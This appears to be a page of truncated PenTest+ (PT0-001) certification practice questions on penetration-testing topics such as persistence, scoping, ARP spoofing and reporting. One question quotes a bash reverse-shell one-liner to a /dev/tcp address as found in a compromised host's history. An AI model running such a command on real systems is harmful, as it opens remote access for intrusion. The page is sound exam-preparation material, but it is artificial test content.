PT0-001 Practice Questions

A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?

A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nucle...

A security analyst was provided with a detailed penetration report, which was performed against the organization's DMZ environment. It was noted on the report that a finding has a...

A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regai...

Which of the following tools is used to perform a credential brute force attack?

Which of the following situations would cause a penetration tester to communicate with a system owner/ client during the course of a test? (Select TWO.)

A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not...

Which of the following is the reason why a penetration tester would run the chkconfig --del command at the end of an engagement? servicename

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the...

A penetration tester executes the following commands: Which of the following is a local host vulnerability that the attacker is exploiting?

A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the...

A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recomme...

Black box penetration testing strategy provides the tester with:

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?

A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies wou...

A security consultant is trying to attack a device with a previously identified user account. Which of the following types of attacks is being executed?

A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below: IP: 192.168.1.20 NETMASK: 255.255.255.0 DEFAULT GATEWAY: 192.168....

A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwilling...

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a c...

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following cond...

Which of the following is an example of a spear phishing attack?

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test th...

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetra...

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?

Which of the following commands starts the Metasploit database?

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. Th...

A penetration tester identifies the following findings during an external vulnerability scan: Which of the following attack strategies should be prioritized from the scan results a...

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetrati...

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and ou...

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10...

A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given th...

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim bac...

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration...

Which of the following are MOST important when planning for an engagement? (Select TWO).

The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 Which of the following describe...

Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?

During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the vic...

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ''changepass." -sr-xr-x 1 root ro...

A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

Given the following Python script: Which of the following is where the output will go?

An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of e...

A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: Which of the following remediation steps should be taken to prevent this type...

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration te...

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over...